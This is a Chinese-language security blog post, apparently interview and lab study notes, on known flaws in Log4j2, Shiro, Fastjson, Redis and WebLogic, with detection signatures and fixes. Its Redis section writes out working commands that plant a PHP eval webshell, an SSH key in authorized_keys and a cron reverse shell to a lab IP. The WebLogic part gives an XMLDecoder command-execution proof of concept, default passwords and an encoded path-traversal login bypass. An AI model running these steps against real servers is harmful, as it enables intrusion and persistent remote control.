

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/mad.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="i4G5d">
  <meta name="keywords" content="">
  
    <meta name="description" content="在这里实时记录和复现一些常见技术栈的漏洞 。持续更新，有些做了简介 暂未详细解释和复现  Log4j2Log4j2 (CVE-2021-44228) —— “核弹级”漏洞Log4j 是 Apache 的一个开源项目，用于 Java 程序的日志记录（就是帮程序员记日记的工具）。  影响太大了： 几乎全球一半的互联网企业都在用它。  利用太简单： 攻击者只需要在输入框、URL 或者 HTTP 头里发">
<meta property="og:type" content="article">
<meta property="og:title" content="常见技术栈漏洞">
<meta property="og:url" content="https://i4g5d.github.io/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="i4G5d-Blog">
<meta property="og:description" content="在这里实时记录和复现一些常见技术栈的漏洞 。持续更新，有些做了简介 暂未详细解释和复现  Log4j2Log4j2 (CVE-2021-44228) —— “核弹级”漏洞Log4j 是 Apache 的一个开源项目，用于 Java 程序的日志记录（就是帮程序员记日记的工具）。  影响太大了： 几乎全球一半的互联网企业都在用它。  利用太简单： 攻击者只需要在输入框、URL 或者 HTTP 头里发">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i4g5d.github.io/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124000955182.png">
<meta property="og:image" content="https://i4g5d.github.io/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001004226.png">
<meta property="og:image" content="https://i4g5d.github.io/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001012726.png">
<meta property="og:image" content="https://i4g5d.github.io/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001025505.png">
<meta property="og:image" content="https://i4g5d.github.io/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001032878.png">
<meta property="og:image" content="https://i4g5d.github.io/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001048703.png">
<meta property="article:published_time" content="2025-11-21T16:06:45.000Z">
<meta property="article:modified_time" content="2025-11-23T16:12:32.697Z">
<meta property="article:author" content="i4G5d">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://i4g5d.github.io/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124000955182.png">
  
  
  
  <title>常见技术栈漏洞 - i4G5d-Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"i4g5d.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":4},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.0.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>i4G5d</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="常见技术栈漏洞"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-11-22 00:06" pubdate>
          2025年11月22日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          45 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">常见技术栈漏洞</h1>
            
            
              <div class="markdown-body">
                
                <blockquote>
<p>在这里实时记录和复现一些常见技术栈的漏洞 。持续更新，有些做了简介 暂未详细解释和复现</p>
</blockquote>
<h2 id="Log4j2"><a href="#Log4j2" class="headerlink" title="Log4j2"></a>Log4j2</h2><p>Log4j2 (CVE-2021-44228) —— “核弹级”漏洞<br>Log4j 是 Apache 的一个开源项目，用于 Java 程序的<strong>日志记录</strong>（就是帮程序员记日记的工具）。</p>
<ul>
<li><p><strong>影响太大了：</strong> 几乎全球一半的互联网企业都在用它。</p>
</li>
<li><p><strong>利用太简单：</strong> 攻击者只需要在输入框、URL 或者 HTTP 头里发送一段特定的字符串，服务器记录日志时就会被触发，直接导致服务器被控制（RCE - 远程代码执行）。</p>
</li>
<li><p><strong>原理（一句话）：</strong> 利用了 Log4j2 的 <strong>JNDI 注入</strong>功能。当日志记录 <code>${jndi:ldap://攻击者IP/脚本}</code> 这种字符串时，它不会原样记录，而是会真的去连接那个 LDAP 服务，把恶意代码下载回来执行。</p>
</li>
<li><p><strong>流量特征（蓝队必背）：</strong></p>
<ul>
<li>请求包中包含 <strong><code>${jndi:ldap://</code></strong> 或 <strong><code>${jndi:rmi://</code></strong>。</li>
<li><strong>混淆绕过：</strong> 攻击者会变形，比如 <code>${${lower:j}ndi:...}</code>。在流量分析时，要看有没有类似 <code>jndi</code>、<code>ldap</code> 的关键词组合。</li>
</ul>
</li>
<li><p><strong>怎么修：</strong> 升级到最新版本；或者在配置中禁用 JNDI lookup。</p>
</li>
</ul>
<h2 id="shiro"><a href="#shiro" class="headerlink" title="shiro"></a>shiro</h2><p><strong>是什么？</strong> Apache Shiro 是一个 Java 的安全框架，负责处理用户的<strong>身份验证</strong>（登录）和<strong>授权</strong>（权限管理）。很多企业内网系统、OA 系统都在用。</p>
<p><strong>为什么提它？</strong></p>
<ul>
<li><strong>存在感强：</strong> 这是一个典型的<strong>Java 反序列化</strong>漏洞。</li>
<li><strong>配置错误普遍：</strong> 开发人员经常使用默认的密钥（Key），导致漏洞产生。</li>
</ul>
<p><strong>面试核心考点（原理 &amp; 特征）：</strong></p>
<ul>
<li><p><strong>原理（重点是“RememberMe”）：</strong></p>
<ul>
<li>Shiro 有一个“记住我”（RememberMe）的功能。</li>
<li>它的工作流程是：<strong>用户信息 -&gt; 序列化 -&gt; AES 加密 -&gt; Base64 编码 -&gt; 放入 Cookie (rememberMe&#x3D;…)</strong>。</li>
<li><strong>漏洞点：</strong> 很多开发者使用了 Shiro <strong>默认的 AES 密钥</strong>（硬编码在代码里，或者网上能查到的）。</li>
<li><strong>攻击方式：</strong> 攻击者用这个默认密钥，把恶意代码（Payload）加密后塞进 Cookie 的 <code>rememberMe</code> 字段。服务器收到后解密并反序列化，就中招了。</li>
</ul>
</li>
<li><p><strong>流量特征（蓝队必背）：</strong></p>
<ul>
<li><strong>Cookie 中有超长字段：</strong> <code>rememberMe=MIGfMA0GCSqGSIb3DQE...</code>（非常长的一串字符）。</li>
<li><strong>响应包特征：</strong> 经常看到 <code>Set-Cookie: rememberMe=deleteMe</code>（这通常意味着攻击者尝试爆破 Key 失败，或者 Key 正确但 Payload 执行后的回显）。</li>
<li><strong>加密流量：</strong> <code>rememberMe</code> 的内容解密不出来（因为是 AES 加密的），除非你拿到了 Key。</li>
</ul>
</li>
</ul>
<h2 id="Fastjson-反序列化"><a href="#Fastjson-反序列化" class="headerlink" title="Fastjson 反序列化"></a>Fastjson 反序列化</h2><ul>
<li><p><strong>是什么：</strong> 阿里巴巴开源的 JSON 解析库（把 JSON 字符串转成 Java 对象）。</p>
</li>
<li><p><strong>特征：</strong> 攻击流量中通常包含 <strong><code>@type</code></strong> 关键字，或者 <strong><code>autoType</code></strong> 相关的报错。</p>
</li>
<li><p><strong>为什么问：</strong> 国内用得非常多，漏洞版本也很多。</p>
</li>
</ul>
<h2 id="Redis-未授权访问"><a href="#Redis-未授权访问" class="headerlink" title="Redis 未授权访问"></a>Redis 未授权访问</h2><h3 id="前置"><a href="#前置" class="headerlink" title="前置"></a>前置</h3><p>Redis是一种内存化键值对（Key-Value）数据库，默认端口 <strong>6379</strong>。常用于缓存，会话存储，特点是速度快，支持多种数据结构（曾经做课程项目也试过用redis存储邮箱验证码）</p>
<ol>
<li>默认无认证机制<br> 任何人只要能网络访问到 6379 端口，即可直接连接并执行所有命令（如读写数据、修改配置、甚至执行系统命令）。默认配置：<code>requirepas</code>注释状态</li>
<li>数据持久化机制<br> <code>RDB</code>：默认开启，在指定时间间隔内将内存中的数据快照写入磁盘（默认文件为 <code>dump.rdb</code>）<br> <code>AOF</code>：记录所有写命令到日志文件（默认文件为 <code>appendonly.aof</code>），重启时重新执行命令恢复数据，将磁盘的数据写回内存。</li>
<li>系统命令执行<br> Redis 可通过 <code>module load</code> 加载自定义模块（<code>.so</code> 文件），部分模块（如 <code>redis-rogue-server</code>）提供 <code>system.exec</code> 等命令，允许直接执行系统命令。（4.x 及以上支持模块加载）</li>
<li>配置动态修改 （<code>config set</code> 命令）<br> Redis 允许通过命令动态修改配置（无需重启服务），例如：<ul>
<li><code>config set dir /root/.ssh/</code>：修改持久化文件的存储目录；</li>
<li><code>config set dbfilename authorized_keys</code>：修改 RDB 文件名；</li>
<li><code>config set appendfilename webshell.jsp</code>：修改 AOF 文件名。</li>
<li>set 参数名 内容<br> 攻击者通过修改配置，将 Redis 持久化文件写入到服务器的敏感路径（如 SSH 公钥目录、Web 目录），实现权限提升或文件写入。</li>
</ul>
</li>
<li>绑定 IP 配置（<code>bind</code> 选项）<br> Redis 配置文件中的 <code>bind</code> 选项用于限制可访问的 IP 地址（默认 <code>bind 127.0.0.1</code>，即仅本地可访问）。若管理员将其修改为 <code>bind 0.0.0.0</code>（允许所有 IP 访问），则 Redis 服务会暴露在公网或局域网中。</li>
</ol>
<p><img src="/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124000955182.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001004226.png" srcset="/img/loading.gif" lazyload></p>
<p>漏洞利用：<br>其实就是利用修改配置参数，修改RDB的持久化文件的位置，利用redis往受害者的各种地方写入数据，可能是往web目录写shell，可能是往.ssh的配置目录里写公钥，可能是写入计划任务</p>
<h3 id="1-利用redis写入webshell"><a href="#1-利用redis写入webshell" class="headerlink" title="1.利用redis写入webshell"></a>1.利用redis写入webshell</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell">config set dir /var/www/html      #指定 Redis 生成 RDB/AOF 持久化文件的存储路径<br>config set dbfilename shell.php   #修改RDB持久化文件名为shell.php<br>set webshell &quot;\r\n\r\n&lt;?php eval($_POST[cmd]);?&gt;\r\n\r\n&quot;  #往shell.php写入参数webshell<br>save<br></code></pre></td></tr></table></figure>
<p>\r\n\r\n 是换行的意思，用redis写入文件的会自带一些版本信息，如果不换行可能会导致无法执行。</p>
<p><img src="/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001012726.png" srcset="/img/loading.gif" lazyload><br>随后webshell管理工具连接shell.php即可</p>
<h3 id="2-利用redis写入SSH公钥"><a href="#2-利用redis写入SSH公钥" class="headerlink" title="2.利用redis写入SSH公钥"></a>2.利用redis写入SSH公钥</h3><p>思路就是把我们的公钥放到受害者的.ssh&#x2F;的配置文件中，这样我们再次连接登录时就能通过私钥进行免密登录<br>前提是服务端存在.ssh目录且有写入权限，</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">cd ~/.ssh #其实不用 这就是默认生成位置<br>ssh-keygen -t rsa #生成密钥对<br></code></pre></td></tr></table></figure>
<p><img src="/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001025505.png" srcset="/img/loading.gif" lazyload><br>随后将公钥值写入受害者redis数据库</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">#</span><span class="language-bash">将公钥写入key.txt文件（前后用\n换行，避免和Redis里其他缓存数据混合）</span><br>(echo -e &quot;\n\n&quot;; cat /root/.ssh/id_rsa.pub; echo -e &quot;\n\n&quot;) &gt; /root/.ssh/key.txt<br>cat /root/.ssh/key.txt | redis-cli -h 192.168.88.150 -x set pkey<br></code></pre></td></tr></table></figure>
<p><img src="/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001032878.png" srcset="/img/loading.gif" lazyload><br>最后修改配置即可</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell">config set dir /root/.ssh<br>config set dbfilename authorized_keys<br>save<br></code></pre></td></tr></table></figure>
<p>这样来以后我们SSH连接受害者的主机就不用密码了，受害者改密码也没用</p>
<h3 id="3-利用redis写入计划任务"><a href="#3-利用redis写入计划任务" class="headerlink" title="3.利用redis写入计划任务"></a>3.利用redis写入计划任务</h3><p>就是写入反弹shell的计划任务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell">config set dir /var/spool/cron/crontabs    #设置存储目录为crontabs<br>config set dbfilename root                  #设置RDB文件为此目录下的root文件<br>set x &quot;\n\n*/1 * * * * bash -i &gt;&amp; /dev/tcp/192.168.88.128/12345 0&gt;&amp;1\n\n&quot;    #写入反弹shell <br>save        #保存 直接写入磁盘<br></code></pre></td></tr></table></figure>
<p>随后攻击机直接监听12345即可</p>
<blockquote>
<p>这里Ubuntu会失败<br><code>Redis</code> 默认生成的持久化文件（RDB&#x2F;AOF）是 644 权限（所有者可读可写、同组用户可读、其他用户可读）<br><code>Ubuntu</code> 对 “定时任务文件（crontab）” 有严格的权限要求 —— 必须是 600 权限（仅所有者可读可写，其他人无任何权限），否则 cron 服务会拒绝执行该定时任务，并报 “不安全模式” 错误。</p>
</blockquote>
<h3 id="应急与防护"><a href="#应急与防护" class="headerlink" title="应急与防护"></a>应急与防护</h3><ul>
<li><p><strong>特征：</strong> 端口扫描 6379，流量中看到 Redis 的命令（<code>config set</code>, <code>save</code>, <code>flushall</code>）。</p>
</li>
<li><p>绑定本地登录地址：在配置文件中设置 bind 127.0.0.1，限制仅本地访问</p>
</li>
<li><p>设置复杂密码：取消<code>requirepass</code> 的注释，设置密码，防止密钥爆破</p>
</li>
<li><p>禁用远程连接：设置 protected-mode 和 rename-command 防止远程连接</p>
</li>
<li><p>网络隔离：将 Redis 服务放在内网环境，不向公网开放端口</p>
</li>
<li><p>账号权限控制：设置只允许特定账号从指定IP进行访问</p>
</li>
<li><p>实时监控：监控并阻止异常访问和命令执行</p>
</li>
</ul>
<h2 id="WebLogic"><a href="#WebLogic" class="headerlink" title="WebLogic"></a>WebLogic</h2><h3 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h3><p>WebLogic是个巨大的中间件漏洞，由Java反序列化引起<br><code>Weblogic</code>是Oracle 的中间件（比tomcat更强大），企业内网中，它通常位于 Web 服务器（如 Nginx）和数据库（Oracle DB）之间。。端口通常是 <strong>7001</strong>。<br><strong>内网大杀器：</strong> 很多时候，外网打点进去后，内网扫描发现一台 WebLogic，基本就意味着拿下了这台服务器的权限。</p>
<h3 id="1-XMLDecoder-反序列化-HTTP"><a href="#1-XMLDecoder-反序列化-HTTP" class="headerlink" title="1. XMLDecoder 反序列化 (HTTP )"></a>1. XMLDecoder 反序列化 (HTTP )</h3><ul>
<li><strong>原理：</strong> 利用服务器的<strong>XMLDecoder</strong>可以解析XML数据这一特性，可以构造XML语句，发送一个 XML 格式的 HTTP POST 请求，上传一句话木马或者反弹shell，WebLogic 解析这个 XML 时执行了恶意代码，getshell。</li>
<li><strong>利用难度：</strong> 低（直接发包即可）。<br>  访问&#x2F;wls-wsat&#x2F;CoordinatorPortType（只要是wls-wsat包中的Url皆收到影响）<br>  构造XML，其中Content-Type需要等于text&#x2F;xml，否则可能导致XMLDecoder不解析。<br><img src="/2025/11/22/%E6%8A%80%E6%9C%AF%E6%A0%88%E6%BC%8F%E6%B4%9E/image-20251124001048703.png" srcset="/img/loading.gif" lazyload>随后nc监听<code>nc -lvnp 6666</code>就拿到shell了<br>   <a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/372568.html">WebLogic XMLDecoder反序列化</a></li>
<li>伪代码POC，调用ProcessBulider.start()执行calc</li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">java</span> <span class="hljs-attr">version</span>=<span class="hljs-string">&quot;1.8.0_131&quot;</span> <span class="hljs-attr">class</span>=<span class="hljs-string">&quot;java.beans.XMLDecoder&quot;</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">object</span> <span class="hljs-attr">class</span>=<span class="hljs-string">&quot;java.lang.ProcessBuilder&quot;</span>&gt;</span><br>        <span class="hljs-tag">&lt;<span class="hljs-name">array</span> <span class="hljs-attr">class</span>=<span class="hljs-string">&quot;java.lang.String&quot;</span> <span class="hljs-attr">length</span>=<span class="hljs-string">&quot;1&quot;</span>&gt;</span><br>            <span class="hljs-tag">&lt;<span class="hljs-name">void</span> <span class="hljs-attr">index</span>=<span class="hljs-string">&quot;0&quot;</span>&gt;</span><br>                <span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>calc<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span> <span class="hljs-tag">&lt;/<span class="hljs-name">void</span>&gt;</span><br>        <span class="hljs-tag">&lt;/<span class="hljs-name">array</span>&gt;</span><br>        <span class="hljs-tag">&lt;<span class="hljs-name">void</span> <span class="hljs-attr">method</span>=<span class="hljs-string">&quot;start&quot;</span> /&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">object</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">java</span>&gt;</span>		<br></code></pre></td></tr></table></figure>
<h3 id="2-T3-反序列化"><a href="#2-T3-反序列化" class="headerlink" title="2. T3 反序列化:"></a>2. T3 反序列化:</h3><ul>
<li><code>T3协议</code>是Oracle Weblogic独有的，用于远程方法调用的专有协议。运行客户端的java程序直接调用服务器上的java对象的method。     此协议运行在TCP之上，复用Weblogic主端口（7001）</li>
<li>客户端发起类似<code>t3 12.2.1 AS:255 HL:19 MS:10000000</code>的握手包，服务器支持的话会回复类似<code>HELO:12.2.1.3.0 false</code>，随后双方开始传输序列化后的java对象数据。这也是最显著的漏洞特征</li>
<li>利用过程<ul>
<li>原本是客户端把正常的Java对象序列化成二进制流，通过T3协议发给服务器，服务器反序列化处理业务</li>
<li>攻击者利用 T3 协议，发送了一个<strong>恶意的序列化数据包</strong>，这个数据包里包裹的可能是<code>CommonsCollections</code> 利用链</li>
<li>Weblogic不检查装的是什么对象就进行反序列化，从而导致恶意利用链在内存里执行从而导致RCE</li>
</ul>
</li>
</ul>
<h3 id="3-后台弱口令-未授权访问"><a href="#3-后台弱口令-未授权访问" class="headerlink" title="3. 后台弱口令 &#x2F; 未授权访问:"></a>3. 后台弱口令 &#x2F; 未授权访问:</h3><ul>
<li><strong>后台地址：</strong> <code>/console</code>，<code>/console/login/LoginForm.jsp</code></li>
<li><strong>常见弱口令：</strong> <code>weblogic / Oracle@123</code>, <code>system / password</code>。</li>
<li>有时候可能无法直接登录访问<code>http://Target:7001/console/console.portal</code>，但通过二次编码的目录穿越（WebLogic 的权限检查器没认出穿越），<code>http://Target:7001/console/css/%252E%252E%252Fconsole.portal</code>,绕过了登录步骤</li>
</ul>
<p> Weblogic反序列化（CVE-2023-21839）漏洞 <a target="_blank" rel="noopener" href="https://www.cnblogs.com/BlogVice-2203/p/17454727.html">https://www.cnblogs.com/BlogVice-2203/p/17454727.html</a><br> 由于Weblogic IIOP&#x2F;T3协议存在缺陷，当IIOP&#x2F;T3协议开启时，允许未经身份验证的攻击者通过IIOP&#x2F;T3协议网络访问攻击存在安全风险的WebLogic Server，漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。<br> WebLogic 在早期修复 <strong>T3 和 IIOP</strong> 的反序列化都是采用<strong>黑名单</strong>的方式修复 <a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/345823.html">https://www.freebuf.com/vuls/345823.html</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F-%E6%8C%96%E6%B4%9E-%E6%94%BB%E5%87%BB/" class="category-chain-item">渗透/挖洞/攻击</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>常见技术栈漏洞</div>
      <div>https://i4g5d.github.io/2025/11/22/技术栈漏洞/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>i4G5d</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年11月22日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/11/17/SRC2/" title="SRC2">
                        <span class="hidden-mobile">SRC2</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
